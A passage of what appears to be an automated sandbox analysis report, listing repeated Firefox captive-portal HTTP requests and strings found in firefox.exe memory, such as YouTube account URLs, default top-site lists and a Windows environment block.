Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
Source: global traffic HTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account" equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"5 equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: "C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3263338339.00000169CAB13000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: *://www.facebook.com/platform/impression.php* equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: .S........[tlsflags0x00000000]www.youtube.com:443^partitionKey=%28https%2Cyoutube.com%29 equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3324674203.00000169D16D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3233159876.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3380737606.00000169D1B9F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3381137545.00000169CD9B2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2821879892.0000029FD2C6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823432869.0000029FD2C81000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2821980090.0000029FD2C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: 8p8https://www.youtube.com/account --attempting-deelevationUser equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3383948586.00000169CBDB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3370039347.00000169CBDB3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3172465493.00000169CBDB3000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: 8~predictor-origin,:https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3324674203.00000169D16D3000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3336782696.00000169D38FB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: :https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: =C:=C:\Windows\System32ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: @https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: ALLUSERSPROFILE=C:\ProgramDataAPPDATA=C:\Users\user\AppData\Roamingb2eincfilepath=C:\Windows\system32chromePath=C:\Program Files\Google\Chrome\Application\chrome.exeCommonProgramFiles=C:\Program Files\Common FilesCommonProgramFiles(x86)=C:\Program Files (x86)\Common FilesCommonProgramW6432=C:\Program Files\Common FilesCOMPUTERNAME=user-PCComSpec=C:\Windows\system32\cmd.exeDriverData=C:\Windows\System32\Drivers\DriverDataedgePath=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exefirefoxPath=C:\Program Files\Mozilla Firefox\firefox.exeFPS_BROWSER_APP_PROFILE_STRING=Internet ExplorerFPS_BROWSER_USER_PROFILE_STRING=DefaultHOMEDRIVE=C:HOMEPATH=\Users\userLOCALAPPDATA=C:\Users\user\AppData\LocalLOGONSERVER=\\user-PCNUMBER_OF_PROCESSORS=2OneDrive=C:\Users\user\OneDriveOS=Windows_NTPath=C:\Program Files (x86)\Common Files\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Windows\System32\OpenSSH\;C:\Users\user\AppData\Local\Microsoft\WindowsAppsPATHEXT=.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSCPROCESSOR_ARCHITECTURE=AMD64PROCESSOR_IDENTIFIER=Intel64 Family 6 Model 143 Stepping 8, GenuineIntelPROCESSOR_LEVEL=6PROCESSOR_REVISION=8f08ProgramData=C:\ProgramDataProgramFiles=C:\Program FilesProgramFiles(x86)=C:\Program Files (x86)ProgramFiles64=C:\Program FilesProgramFiles86=C:\Program Files (x86)ProgramW6432=C:\Program FilesPROMPT=$P$GPSModulePath=%ProgramFiles(x86)%\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules;C:\Program Files (x86)\AutoIt3\AutoItXPUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPROFILE=C:\Users\userwindir=C:\Windows equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/account--attempting-deelevation equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Program Files\Mozilla Firefox\firefox.exehttps://www.youtube.com/accounts equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" "https://www.youtube.com/account"winsta0\defaultq equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001F.00000002.2901568725.000002196FBF0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Windows\system32\C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" https://www.youtube.com/account --attempting-deelevationC:\Program Files\Mozilla Firefox\firefox.exeWinsta0\Default equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3329338474.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3231852517.00000169D9BEF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3066703967.00000169D9BDA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: O^partitionKey=%28https%2Cyoutube.com%29,:https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823432869.0000029FD2C81000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: PUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userY equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000003.2821879892.0000029FD2C6E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000003.2821980090.0000029FD2C80000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: PUBLIC=C:\Users\PublicSystemDrive=C:SystemRoot=C:\WindowsTEMP=C:\Users\user\AppData\Local\TempTMP=C:\Users\user\AppData\Local\TempURL=https://www.youtube.com/accountUSERDOMAIN=user-PCUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=user` equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823704652.0000029FD3060000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account equals www.youtube.com (Youtube)
Source: firefox.exe, 0000001C.00000002.2823296830.0000029FD2C50000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: URL=https://www.youtube.com/account~H equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3236274677.00000169D994F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3333005416.00000169D9941000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3330455792.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3233159876.00000169D9B3D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://vk.com/,https://www.youtube.com/,https://ok.ru/,https://www.avito.ru/,https://www.aliexpress.com/,https://www.wikipedia.org/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3332787650.00000169D9952000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3398831276.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3166300363.00000169CC25E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3373672563.00000169CBCC1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3141555486.00000169D9B45000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000021.00000003.3374410709.00000169D9DAB000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://allegro.pl/,https://www.wikipedia.org/,https://www.olx.pl/,https://www.wykop.pl/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.twitter.com (Twitter)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.com/,https://www.reddit.com/,https://www.wikipedia.org/,https://twitter.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.amazon.de/,https://www.ebay.de/,https://www.wikipedia.org/,https://www.reddit.com/ equals www.youtube.com (Youtube)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.facebook.com (Facebook)
Source: firefox.exe, 00000021.00000003.3386865064.00000169CBACF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/,https://www.facebook.com/,https://www.reddit.com/,https://www.amazon.co.uk/,https://www.bbc.co.uk/,https://www.ebay.co.uk/ equals www.youtube.com (Youtube)
